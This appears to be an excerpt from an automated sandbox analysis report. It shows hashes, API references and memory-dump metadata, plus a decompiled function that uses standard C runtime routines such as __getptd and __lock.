                                                                                                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                • Instruction Fuzzy Hash: A111423200014EBBCF165E95CC41DEE3FA7FB18350B588495FB1856031CB36C975AB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF3060, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E00BF3060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xbfdcf8);
				E00BF3F70(__ebx, __edi, __esi);
				_t28 = E00BF339D(__ebx, __edi, _t30);
				_t13 =  *0xbff534; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00BF3C3D(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0xbff618; // 0xbff540
					 *((intOrPtr*)(_t29 - 0x1c)) = E00BF3022(_t8, _t25, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00BF30CA();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00BF339D(_t22, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00BF2033(_t25, _t26, 0x20);
				}
				return E00BF3FB5(_t28);
			}








                                                                                                                                                0x00bf3060
                                                                                                                                                0x00bf3060
                                                                                                                                                0x00bf3060
                                                                                                                                                0x00bf3060
                                                                                                                                                0x00bf3060
                                                                                                                                                0x00bf3062
                                                                                                                                                0x00bf3067
                                                                                                                                                0x00bf3071
                                                                                                                                                0x00bf3073
                                                                                                                                                0x00bf307b
                                                                                                                                                0x00bf309f
                                                                                                                                                0x00bf30a1
                                                                                                                                                0x00bf30a7
                                                                                                                                                0x00bf30ab
                                                                                                                                                0x00bf30ae
                                                                                                                                                0x00bf30b9
                                                                                                                                                0x00bf30bc
                                                                                                                                                0x00bf30c3
                                                                                                                                                0x00bf307d
                                                                                                                                                0x00bf307d
                                                                                                                                                0x00bf3081
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf3083
                                                                                                                                                0x00bf3088
                                                                                                                                                0x00bf3088
                                                                                                                                                0x00bf3081
                                                                                                                                                0x00bf308d
                                                                                                                                                0x00bf3091
                                                                                                                                                0x00bf3096
                                                                                                                                                0x00bf309e

                                                                                                                                                APIs
                                                                                                                                                • __getptd.LIBCMT ref: 00BF306C
                                                                                                                                                  • Part of subcall function 00BF339D: __getptd_noexit.LIBCMT ref: 00BF33A0
                                                                                                                                                  • Part of subcall function 00BF339D: __amsg_exit.LIBCMT ref: 00BF33AD
                                                                                                                                                • __getptd.LIBCMT ref: 00BF3083
                                                                                                                                                • __amsg_exit.LIBCMT ref: 00BF3091
                                                                                                                                                • __lock.LIBCMT ref: 00BF30A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                                • Opcode ID: d1197ead1fcd3bbaeb22f144ea0585a70901e82bb6b3291a9767db7c8d4ecbba
                                                                                                                                                • Instruction ID: 8e3d63613ef85d9440220df550cb064ef05de61be3493edf3b6821b28ddbf4f0
                                                                                                                                                • Opcode Fuzzy Hash: d1197ead1fcd3bbaeb22f144ea0585a70901e82bb6b3291a9767db7c8d4ecbba
                                                                                                                                                • Instruction Fuzzy Hash: 3EF01D3294170D9AD720EB74944A77D73E0AF00F11F1045DAE6A4972D2CF749B49CAA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%